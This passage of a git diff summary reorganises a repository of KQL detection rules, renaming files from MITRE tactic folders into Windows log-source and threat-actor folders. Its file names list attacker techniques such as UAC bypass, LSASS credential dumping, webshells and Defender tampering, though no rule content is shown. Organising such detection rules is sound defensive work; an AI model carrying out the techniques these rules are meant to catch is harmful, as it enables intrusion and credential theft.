windows/process_creation}/weak_or_abused_passwords_in_cli.kql (100%) rename KQL/rules/{Exfiltration => windows/process_creation}/webdav_client_execution_via_rundll32_exe.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/webshell_detection_with_command_line_keywords.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/webshell_hacking_activity_patterns.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/webshell_tool_reconnaissance_activity.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/whoami_as_parameter.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/whoami_exe_execution_anomaly.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/whoami_exe_execution_from_privileged_process.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/whoami_exe_execution_with_output_option.kql (100%) rename KQL/rules/{Lateral Movement => windows/process_creation}/windows_admin_share_mount_via_net_exe.kql (100%) rename KQL/rules/{Impact => windows/process_creation}/windows_backup_deleted_via_wbadmin_exe.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/windows_credential_manager_access_via_vaultcmd.kql (100%) create mode 100644 KQL/rules/windows/process_creation/windows_default_domain_gpo_modification_via_gpme.kql rename KQL/rules/{Defense Evasion => windows/process_creation}/windows_defender_context_menu_removed.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/windows_defender_definition_files_removed.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/windows_firewall_disabled_via_powershell.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/windows_hotfix_updates_reconnaissance_via_wmic_exe.kql (100%) rename KQL/rules/{Lateral Movement => windows/process_creation}/windows_internet_hosted_webdav_share_mount_via_net_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/windows_kernel_debugger_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/windows_processes_suspicious_parent_directory.kql (100%) rename KQL/rules/{Collection => windows/process_creation}/windows_recall_feature_enabled_via_reg_exe.kql (100%) rename KQL/rules/{Impact => windows/process_creation}/windows_recovery_environment_disabled_via_reagentc.kql (100%) rename KQL/rules/{Lateral Movement => windows/process_creation}/windows_share_mount_via_net_exe.kql (100%) rename KQL/rules/{Collection => windows/process_creation}/winrar_compressing_dump_files.kql (100%) rename KQL/rules/{Collection => windows/process_creation}/winrar_execution_in_non_standard_folder.kql (100%) rename KQL/rules/{Lateral Movement => windows/process_creation}/winrs_local_command_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/wlrmdr_exe_uncommon_argument_or_child_process.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/wmi_backdoor_exchange_transport_agent.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/wmi_persistence_script_event_consumer.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/wmic_remote_command_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/wmiprvse_spawned_a_process.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/write_protect_for_storage_disabled.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/writing_of_malicious_files_to_the_fonts_folder.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/wscript_shell_run_in_commandline.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/wsl_child_process_anomaly.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/wsl_kali_linux_usage.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/wusa_exe_executed_by_parent_process_located_in_suspicious_location.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/xbap_execution_from_uncommon_locations_via_presentationhost_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/xsl_script_execution_via_wmic_exe.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/xwizard_exe_execution_from_non_default_location.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_add}/potential_persistence_via_disk_cleanup_handler_registry.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_delete}/delete_defender_scan_shellex_context_menu_registry_key.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_delete}/folder_removed_from_exploit_guard_protectedfolders_list_registry.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_delete}/removal_of_amsi_provider_registry_keys.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_delete}/removal_of_index_value_to_hide_schedule_task_registry.kql (67%) rename KQL/rules/{Persistence => windows/registry/registry_delete}/removal_of_potential_com_hijacking_registry_keys.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_delete}/removal_of_sd_value_to_hide_schedule_task_registry.kql (64%) rename KQL/rules/{Defense Evasion => windows/registry/registry_delete}/runmru_registry_key_deletion_registry.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_delete}/terminal_server_client_connection_history_cleared_registry.kql (100%) rename KQL/rules/{Collection => windows/registry/registry_delete}/windows_recall_feature_enabled_disableaidataanalysis_value_deleted.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_event}/atbroker_registry_change.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_event}/cmstp_execution_registry_event.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_event}/creation_of_a_local_hidden_user_account_by_registry.kql (91%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_event}/dll_load_via_lsass.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_event}/enable_remote_connection_between_anonymous_computer_allowanonymouscallback.kql (100%) rename KQL/rules/{Credential Access => windows/registry/registry_event}/esentutl_volume_shadow_copy_service_keys.kql (100%) rename KQL/rules/{Resource Development => windows/registry/registry_event}/hybridconnectionmanager_service_installation_registry.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_event}/narrator_s_feedback_hub_persistence.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_event}/netntlm_downgrade_attack_registry.kql (100%) rename KQL/rules/{Lateral Movement => windows/registry/registry_event}/new_portproxy_registry_entry_added.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_event}/office_application_startup_office_test.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_event}/path_to_screensaver_binary_modified.kql (100%) rename KQL/rules/{Credential Access => windows/registry/registry_event}/potential_credential_dumping_via_lsass_silentprocessexit_technique.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_event}/potential_qakbot_registry_activity.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_event}/redmimicry_winnti_playbook_registry_manipulation.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_event}/registry_entries_for_azorult_malware.kql (100%) create mode 100644 KQL/rules/windows/registry/registry_event/registry_tampering_by_potentially_suspicious_processes.kql rename KQL/rules/{Persistence => windows/registry/registry_event}/run_once_task_configuration_in_registry.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_event}/security_support_provider_ssp_added_to_lsa_configuration.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_event}/shell_open_registry_keys_manipulation.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_event}/sticky_key_like_backdoor_usage_registry.kql (100%) rename KQL/rules/{Collection => windows/registry/registry_event}/suspicious_camera_and_microphone_access.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_event}/suspicious_run_key_from_download.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_event}/uac_bypass_via_wsreset.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_event}/wdigest_credguard_registry_modification.kql (100%) rename KQL/rules/{Credential Access => windows/registry/registry_event}/windows_credential_editor_registry.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_event}/windows_defender_threat_severity_default_action_modified.kql (100%) rename KQL/rules/{Initial Access => windows/registry/registry_event}/windows_registry_trust_record_modification.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_event}/winekey_registry_modification.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/activate_suppression_of_windows_security_center_notifications.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/add_debugger_entry_to_aedebug_for_persistence.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/add_debugger_entry_to_hangs_key_for_persistence.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/add_disallowrun_execution_to_registry.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/add_port_monitor_persistence_in_registry.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/allow_rdp_remote_assistance_feature.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/antivirus_filter_driver_disallowed_on_dev_drive_registry.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/bypass_uac_using_delegateexecute.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/bypass_uac_using_event_viewer.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/bypass_uac_using_silentcleanup_task.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/change_the_fax_dll.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/change_user_account_associated_with_the_fax_service.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/change_winevt_channel_access_permission_via_registry.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/classes_autorun_keys_modification.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/clickonce_trust_prompt_tampering.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/com_hijack_via_sdclt.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/com_hijacking_via_treatas.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/com_object_hijacking_via_modification_of_default_system_clsid_default_value.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/common_autorun_keys_modification.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/crashcontrol_crashdump_disabled.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/currentcontrolset_autorun_keys_modification.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/currentversion_autorun_keys_modification.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/currentversion_nt_autorun_keys_modification.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/custom_file_open_handler_executes_powershell.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/default_rdp_port_changed_to_non_standard_port.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/dhcp_callout_dll_installation.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/directory_service_restore_mode_dsrm_registry_value_tampering.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/disable_administrative_share_creation_at_startup.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/disable_exploit_guard_network_protection_on_windows_defender.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/disable_internal_tools_or_feature_in_registry.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/disable_macro_runtime_scan_scope.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/disable_microsoft_defender_firewall_via_registry.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/disable_privacy_settings_experience_in_registry.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/disable_pua_protection_on_windows_defender.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/disable_tamper_protection_on_windows_defender.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/disable_windows_defender_functionalities_via_registry_keys.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/disable_windows_event_logging_via_registry.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/disable_windows_firewall_by_registry.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/disable_windows_security_center_notifications.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/disabled_windows_defender_eventlog.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/displaying_hidden_files_feature_disabled.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/dns_over_https_enabled_by_registry.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/driver_added_to_disallowed_images_in_hvci_registry.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/enable_lm_hash_storage.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/enable_local_manifest_installation_with_winget.kql (100%) rename KQL/rules/{Execution => windows/registry/registry_set}/enable_microsoft_dynamic_data_exchange.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/enabling_cor_profiler_environment_variables.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/etw_logging_disabled_for_rpcrt4_dll.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/etw_logging_disabled_for_scm.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/etw_logging_disabled_in_net_processes_sysmon_registry.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/execution_dll_of_choice_using_wab_exe.kql (100%) create mode 100644 KQL/rules/windows/registry/registry_set/filefix_command_evidence_in_typedpaths.kql rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/hide_schedule_task_via_index_value_tamper.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/hiding_user_account_via_specialaccounts_registry_key.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/hypervisor_enforced_code_integrity_disabled.kql (69%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/hypervisor_enforced_paging_translation_disabled.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/ie_change_domain_zone.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/internet_explorer_autorun_keys_modification.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/internet_explorer_disablefirstruncustomize_enabled.kql (100%) rename KQL/rules/{Command and Control => windows/registry/registry_set}/lolbas_onedrivestandaloneupdater_exe_proxy_download.kql (100%) rename KQL/rules/{Credential Access => windows/registry/registry_set}/lsass_full_dump_request_via_dumptype_registry_settings.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/macro_enabled_in_a_potentially_suspicious_document.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/maxmpxct_registry_value_changed.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/microsoft_office_protected_view_disabled.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/modification_of_ie_registry_settings.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/modify_user_shell_folders_startup_value.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/net_ngenassemblyusagelog_registry_key_tamper.kql (100%) rename KQL/rules/{Execution => windows/registry/registry_set}/new_application_in_appcompat.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/new_bginfo_exe_custom_db_path_registry_configuration.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/new_bginfo_exe_custom_vbscript_registry_configuration.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/new_bginfo_exe_custom_wmi_query_registry_configuration.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/new_dns_serverlevelplugindll_installed.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/new_file_association_using_exefile.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/new_netsh_helper_dll_registered_from_a_suspicious_location.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/new_odbc_driver_registered.kql (100%) rename KQL/rules/{Impact => windows/registry/registry_set}/new_root_or_ca_or_authroot_certificate_to_store.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/new_run_key_pointing_to_suspicious_folder.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/new_timeproviders_registered_with_uncommon_dll_name.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/office_autorun_keys_modification.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/office_macros_warning_disabled.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/old_tls1_0_tls1_1_protocol_version_enabled.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/outlook_enableunsafeclientmailrules_setting_enabled_registry.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/outlook_macro_execution_without_warning_setting_enabled.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/outlook_security_settings_updated_registry.kql (100%) rename KQL/rules/{Collection => windows/registry/registry_set}/periodic_backup_for_system_registry_hives_enabled.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/persistence_via_disk_cleanup_handler_autorun.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/persistence_via_hhctrl_ocx.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/persistence_via_new_sip_provider.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/potential_amsi_com_server_hijacking.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/potential_attachment_manager_settings_associations_tamper.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/potential_attachment_manager_settings_attachments_tamper.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/potential_autologger_sessions_tampering.kql (100%) rename KQL/rules/{Execution => windows/registry/registry_set}/potential_clickfix_execution_pattern_registry.kql (59%) rename KQL/rules/{Persistence => windows/registry/registry_set}/potential_cobaltstrike_service_installations_registry.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/potential_com_object_hijacking_via_treatas_subkey_registry.kql (66%) rename KQL/rules/{Credential Access => windows/registry/registry_set}/potential_credential_dumping_attempt_using_new_networkprovider_reg.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/potential_eventlog_file_location_tampering.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/potential_pendingfilerenameoperations_tampering.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/potential_persistence_using_debugpath.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/potential_persistence_via_app_paths_default_property.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/potential_persistence_via_appcompat_registerapprestart_layer.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/potential_persistence_via_autodialdll.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/potential_persistence_via_chm_helper_dll.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/potential_persistence_via_custom_protocol_handler.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/potential_persistence_via_dllpathoverride.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/potential_persistence_via_event_viewer_events_asp.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/potential_persistence_via_excel_add_in_registry.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/potential_persistence_via_globalflags.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/potential_persistence_via_logon_scripts_registry.kql (86%) rename KQL/rules/{Persistence => windows/registry/registry_set}/potential_persistence_via_lsa_extensions.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/potential_persistence_via_mpnotify.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/potential_persistence_via_mycomputer_registry_keys.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/potential_persistence_via_netsh_helper_dll_registry.kql (100%) create mode 100644 KQL/rules/windows/registry/registry_set/potential_persistence_via_new_amsi_providers_registry.kql rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/potential_persistence_via_outlook_home_page.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/potential_persistence_via_outlook_loadmacroprovideronboot_setting.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/potential_persistence_via_outlook_today_page.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/potential_persistence_via_scrobj_dll_com_hijacking.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/potential_persistence_via_shim_database_in_uncommon_location.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/potential_persistence_via_shim_database_modification.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/potential_persistence_via_typedpaths.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/potential_persistence_via_visual_studio_tools_for_office.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/potential_powershell_execution_policy_tampering.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/potential_provisioning_registry_key_abuse_for_binary_proxy_execution_reg.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/potential_psfactorybuffer_com_hijacking.kql (100%) rename KQL/rules/{Impact => windows/registry/registry_set}/potential_ransomware_activity_using_legalnotice_message.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/potential_registry_persistence_attempt_via_dbgmanageddebugger.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/potential_registry_persistence_attempt_via_windows_telemetry.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/potential_sentinelone_shell_context_menu_scan_command_tampering.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/potential_signing_bypass_via_windows_developer_features_registry.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/potential_werfault_reflectdebugger_registry_value_abuse.kql (100%) rename KQL/rules/{Execution => windows/registry/registry_set}/potentially_suspicious_command_executed_via_run_dialog_box_registry.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/potentially_suspicious_desktop_background_change_via_registry.kql (100%) rename KQL/rules/{Credential Access => windows/registry/registry_set}/potentially_suspicious_odbc_driver_registered.kql (100%) rename KQL/rules/{Execution => windows/registry/registry_set}/powershell_as_a_service_in_registry.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/powershell_logging_disabled_via_registry_key_tampering.kql (91%) rename KQL/rules/{Execution => windows/registry/registry_set}/powershell_script_execution_policy_enabled.kql (100%) rename KQL/rules/{Resource Development => windows/registry/registry_set}/pua_sysinternal_tool_execution_registry.kql (84%) rename KQL/rules/{Resource Development => windows/registry/registry_set}/pua_sysinternals_tools_execution_registry.kql (54%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/python_function_execution_security_warning_disabled_in_excel_registry.kql (100%) create mode 100644 KQL/rules/windows/registry/registry_set/rdp_sensitive_settings_changed.kql rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/rdp_sensitive_settings_changed_to_zero.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/register_new_ifiltre_for_persistence.kql (100%) rename KQL/rules/{Impact => windows/registry/registry_set}/registry_disable_system_restore.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/registry_explorer_policy_modification.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/registry_hide_function_from_user.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/registry_modification_to_hidden_file_extension.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/registry_persistence_via_explorer_run_key.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/registry_persistence_via_service_in_safe_mode.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/restrictedadminmode_registry_value_tampering.kql (100%) rename KQL/rules/{Initial Access => windows/registry/registry_set}/running_chrome_vpn_extensions_via_the_registry_2_vpn_extension.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/scheduled_taskcache_change_by_uncommon_program.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/screensaver_registry_key_set.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/scripted_diagnostics_turn_off_check_enabled_registry.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/security_event_logging_disabled_via_minint_registry_key_registry_set.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/service_binary_in_suspicious_folder.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/servicedll_hijack.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/session_manager_autorun_keys_modification.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/suspicious_application_allowed_through_exploit_guard.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/suspicious_environment_variable_has_been_registered.kql (100%) create mode 100644 KQL/rules/windows/registry/registry_set/suspicious_execution_of_renamed_sysinternals_tools_registry.kql rename KQL/rules/{Resource Development => windows/registry/registry_set}/suspicious_keyboard_layout_load.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/suspicious_path_in_keyboard_layout_ime_file_registry_value.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/suspicious_powershell_in_registry_run_keys.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/suspicious_printer_driver_empty_manufacturer.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/suspicious_service_installed.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/suspicious_shim_database_patching_activity.kql (100%) rename KQL/rules/{Execution => windows/registry/registry_set}/suspicious_space_characters_in_runmru_registry_path_clickfix.kql (100%) rename KQL/rules/{Execution => windows/registry/registry_set}/suspicious_space_characters_in_typedpaths_registry_path_filefix.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/sysmon_driver_altitude_change.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/system_scripts_autorun_keys_modification.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/tamper_with_sophos_av_registry_keys.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/trust_access_disable_for_vbapplications.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/uac_bypass_abusing_winsat_path_parsing_registry.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/uac_bypass_using_windows_media_player_registry.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/uac_bypass_via_event_viewer.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/uac_bypass_via_sdclt.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/uac_disabled.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/uac_notification_disabled.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/uac_secure_desktop_prompt_disabled.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/uncommon_extension_in_keyboard_layout_ime_file_registry_value.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/uncommon_microsoft_office_trusted_location_added.kql (100%) rename KQL/rules/{Resource Development => windows/registry/registry_set}/usage_of_renamed_sysinternals_tools_registryset.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/vbscript_payload_stored_in_registry.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/wdigest_enable_uselogoncredential.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/wfp_filter_added_via_registry.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/windows_defender_exclusions_added_registry.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/windows_defender_service_disabled_registry.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/windows_event_log_access_tampering_via_registry.kql (100%) rename KQL/rules/{Collection => windows/registry/registry_set}/windows_recall_feature_enabled_registry.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/winget_admin_settings_modification.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/winlogon_allowmultipletssessions_enable.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/winlogon_notify_key_logon_persistence.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/winsock2_autorun_keys_modification.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/wow6432node_classes_autorun_keys_modification.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/wow6432node_currentversion_autorun_keys_modification.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/wow6432node_windows_nt_currentversion_autorun_keys_modification.kql (100%) diff --git a/KQL/rules-emerging-threats/Execution/zxshell_malware.kql b/KQL/rules-emerging-threats/2014/TA/Axiom/zxshell_malware.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/zxshell_malware.kql rename to KQL/rules-emerging-threats/2014/TA/Axiom/zxshell_malware.kql diff --git a/KQL/rules-emerging-threats/Privilege Escalation/turla_group_commands_may_2020.kql b/KQL/rules-emerging-threats/2014/TA/Turla/turla_group_commands_may_2020.kql similarity index 100% rename from KQL/rules-emerging-threats/Privilege Escalation/turla_group_commands_may_2020.kql rename to KQL/rules-emerging-threats/2014/TA/Turla/turla_group_commands_may_2020.kql diff --git a/KQL/rules-emerging-threats/Execution/turla_group_lateral_movement.kql 